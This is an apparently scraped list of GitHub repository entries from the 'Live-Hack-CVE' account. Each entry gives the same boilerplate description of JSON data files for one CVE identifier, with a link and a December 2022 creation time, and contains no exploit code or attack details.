**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24472](https://github.com/Live-Hack-CVE/CVE-2022-24472) create time: 2022-12-24T03:15:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30049](https://github.com/Live-Hack-CVE/CVE-2022-30049) create time: 2022-12-24T03:15:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-6755 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-6755](https://github.com/Live-Hack-CVE/CVE-2007-6755) create time: 2022-12-24T02:33:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7434](https://github.com/Live-Hack-CVE/CVE-2018-7434) create time: 2022-12-24T02:00:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-9331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-9331](https://github.com/Live-Hack-CVE/CVE-2018-9331) create time: 2022-12-24T01:59:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-9309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-9309](https://github.com/Live-Hack-CVE/CVE-2018-9309) create time: 2022-12-24T01:59:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8965 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8965](https://github.com/Live-Hack-CVE/CVE-2018-8965) create time: 2022-12-24T01:59:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8968](https://github.com/Live-Hack-CVE/CVE-2018-8968) create time: 2022-12-24T01:59:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8966](https://github.com/Live-Hack-CVE/CVE-2018-8966) create time: 2022-12-24T01:59:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8967 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8967](https://github.com/Live-Hack-CVE/CVE-2018-8967) create time: 2022-12-24T01:59:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8969 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8969](https://github.com/Live-Hack-CVE/CVE-2018-8969) create time: 2022-12-24T01:59:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21016](https://github.com/Live-Hack-CVE/CVE-2020-21016) create time: 2022-12-24T02:02:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36605](https://github.com/Live-Hack-CVE/CVE-2020-36605) create time: 2022-12-24T01:56:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36206](https://github.com/Live-Hack-CVE/CVE-2021-36206) create time: 2022-12-24T02:02:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45710 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45710](https://github.com/Live-Hack-CVE/CVE-2021-45710) create time: 2022-12-24T02:02:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42777](https://github.com/Live-Hack-CVE/CVE-2021-42777) create time: 2022-12-24T02:00:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44790](https://github.com/Live-Hack-CVE/CVE-2021-44790) create time: 2022-12-24T01:56:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44224](https://github.com/Live-Hack-CVE/CVE-2021-44224) create time: 2022-12-24T01:56:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4166](https://github.com/Live-Hack-CVE/CVE-2021-4166) create time: 2022-12-24T01:56:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4187](https://github.com/Live-Hack-CVE/CVE-2021-4187) create time: 2022-12-24T01:56:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4173](https://github.com/Live-Hack-CVE/CVE-2021-4173) create time: 2022-12-24T01:56:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44034](https://github.com/Live-Hack-CVE/CVE-2022-44034) create time: 2022-12-24T02:33:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40741](https://github.com/Live-Hack-CVE/CVE-2022-40741) create time: 2022-12-24T02:33:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40742 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40742](https://github.com/Live-Hack-CVE/CVE-2022-40742) create time: 2022-12-24T02:33:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3419](https://github.com/Live-Hack-CVE/CVE-2022-3419) create time: 2022-12-24T02:02:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3441 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3441](https://github.com/Live-Hack-CVE/CVE-2022-3441) create time: 2022-12-24T02:02:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37913](https://github.com/Live-Hack-CVE/CVE-2022-37913) create time: 2022-12-24T02:02:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2741](https://github.com/Live-Hack-CVE/CVE-2022-2741) create time: 2022-12-24T02:02:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3774](https://github.com/Live-Hack-CVE/CVE-2022-3774) create time: 2022-12-24T02:02:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43281](https://github.com/Live-Hack-CVE/CVE-2022-43281) create time: 2022-12-24T02:02:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43280](https://github.com/Live-Hack-CVE/CVE-2022-43280) create time: 2022-12-24T02:02:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43282 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43282](https://github.com/Live-Hack-CVE/CVE-2022-43282) create time: 2022-12-24T02:02:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40471 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40471](https://github.com/Live-Hack-CVE/CVE-2022-40471) create time: 2022-12-24T02:02:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3408](https://github.com/Live-Hack-CVE/CVE-2022-3408) create time: 2022-12-24T02:02:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3770](https://github.com/Live-Hack-CVE/CVE-2022-3770) create time: 2022-12-24T02:02:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43283](https://github.com/Live-Hack-CVE/CVE-2022-43283) create time: 2022-12-24T02:02:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37424 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37424](https://github.com/Live-Hack-CVE/CVE-2022-37424) create time: 2022-12-24T02:02:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42925 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42925](https://github.com/Live-Hack-CVE/CVE-2022-42925) create time: 2022-12-24T02:02:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43355](https://github.com/Live-Hack-CVE/CVE-2022-43355) create time: 2022-12-24T02:01:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43354 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43354](https://github.com/Live-Hack-CVE/CVE-2022-43354) create time: 2022-12-24T02:01:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40488](https://github.com/Live-Hack-CVE/CVE-2022-40488) create time: 2022-12-24T02:01:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43353 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43353](https://github.com/Live-Hack-CVE/CVE-2022-43353) create time: 2022-12-24T02:01:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40487](https://github.com/Live-Hack-CVE/CVE-2022-40487) create time: 2022-12-24T02:01:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43167](https://github.com/Live-Hack-CVE/CVE-2022-43167) create time: 2022-12-24T02:01:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3765 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3765](https://github.com/Live-Hack-CVE/CVE-2022-3765) create time: 2022-12-24T02:01:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3766](https://github.com/Live-Hack-CVE/CVE-2022-3766) create time: 2022-12-24T02:01:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42924 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42924](https://github.com/Live-Hack-CVE/CVE-2022-42924) create time: 2022-12-24T02:01:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44079 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44079](https://github.com/Live-Hack-CVE/CVE-2022-44079) create time: 2022-12-24T02:01:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37620](https://github.com/Live-Hack-CVE/CVE-2022-37620) create time: 2022-12-24T02:01:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44081](https://github.com/Live-Hack-CVE/CVE-2022-44081) create time: 2022-12-24T02:01:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3499](https://github.com/Live-Hack-CVE/CVE-2022-3499) create time: 2022-12-24T02:01:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2005-2224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2005-2224](https://github.com/Live-Hack-CVE/CVE-2005-2224) create time: 2022-12-24T01:19:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-0333 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-0333](https://github.com/Live-Hack-CVE/CVE-2008-0333) create time: 2022-12-24T01:19:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0127](https://github.com/Live-Hack-CVE/CVE-2010-0127) create time: 2022-12-24T00:36:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0130](https://github.com/Live-Hack-CVE/CVE-2010-0130) create time: 2022-12-24T00:36:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0986](https://github.com/Live-Hack-CVE/CVE-2010-0986) create time: 2022-12-24T00:36:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0987 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0987](https://github.com/Live-Hack-CVE/CVE-2010-0987) create time: 2022-12-24T00:36:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-5312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-5312](https://github.com/Live-Hack-CVE/CVE-2010-5312) create time: 2022-12-24T00:32:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-5327 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-5327](https://github.com/Live-Hack-CVE/CVE-2011-5327) create time: 2022-12-24T01:15:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-3191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-3191](https://github.com/Live-Hack-CVE/CVE-2011-3191) create time: 2022-12-24T01:15:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-6712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-6712](https://github.com/Live-Hack-CVE/CVE-2012-6712) create time: 2022-12-24T01:15:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3900 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3900](https://github.com/Live-Hack-CVE/CVE-2013-3900) create time: 2022-12-24T01:21:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3710 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3710](https://github.com/Live-Hack-CVE/CVE-2014-3710) create time: 2022-12-23T23:49:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4002](https://github.com/Live-Hack-CVE/CVE-2015-4002) create time: 2022-12-24T01:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1421 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1421](https://github.com/Live-Hack-CVE/CVE-2015-1421) create time: 2022-12-24T00:32:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8873 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8873](https://github.com/Live-Hack-CVE/CVE-2015-8873) create time: 2022-12-23T23:49:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1352](https://github.com/Live-Hack-CVE/CVE-2015-1352) create time: 2022-12-23T23:49:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10229](https://github.com/Live-Hack-CVE/CVE-2016-10229) create time: 2022-12-24T00:32:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3955 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3955](https://github.com/Live-Hack-CVE/CVE-2016-3955) create time: 2022-12-24T00:32:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7103](https://github.com/Live-Hack-CVE/CVE-2016-7103) create time: 2022-12-24T00:31:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-18379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-18379](https://github.com/Live-Hack-CVE/CVE-2017-18379) create time: 2022-12-24T01:15:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-5897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-5897](https://github.com/Live-Hack-CVE/CVE-2017-5897) create time: 2022-12-24T01:15:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-13715 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-13715](https://github.com/Live-Hack-CVE/CVE-2017-13715) create time: 2022-12-24T01:14:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-20836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-20836](https://github.com/Live-Hack-CVE/CVE-2018-20836) create time: 2022-12-24T01:15:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17519](https://github.com/Live-Hack-CVE/CVE-2019-17519) create time: 2022-12-24T01:21:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17060](https://github.com/Live-Hack-CVE/CVE-2019-17060) create time: 2022-12-24T01:21:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13120](https://github.com/Live-Hack-CVE/CVE-2019-13120) create time: 2022-12-24T01:21:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10126](https://github.com/Live-Hack-CVE/CVE-2019-10126) create time: 2022-12-24T01:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16746](https://github.com/Live-Hack-CVE/CVE-2019-16746) create time: 2022-12-24T01:14:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10220](https://github.com/Live-Hack-CVE/CVE-2019-10220) create time: 2022-12-24T01:14:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17133](https://github.com/Live-Hack-CVE/CVE-2019-17133) create time: 2022-12-24T01:14:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14897](https://github.com/Live-Hack-CVE/CVE-2019-14897) create time: 2022-12-24T01:14:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14895](https://github.com/Live-Hack-CVE/CVE-2019-14895) create time: 2022-12-24T01:14:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9852](https://github.com/Live-Hack-CVE/CVE-2019-9852) create time: 2022-12-24T00:36:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-25013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-25013](https://github.com/Live-Hack-CVE/CVE-2019-25013) create time: 2022-12-24T00:33:36Z

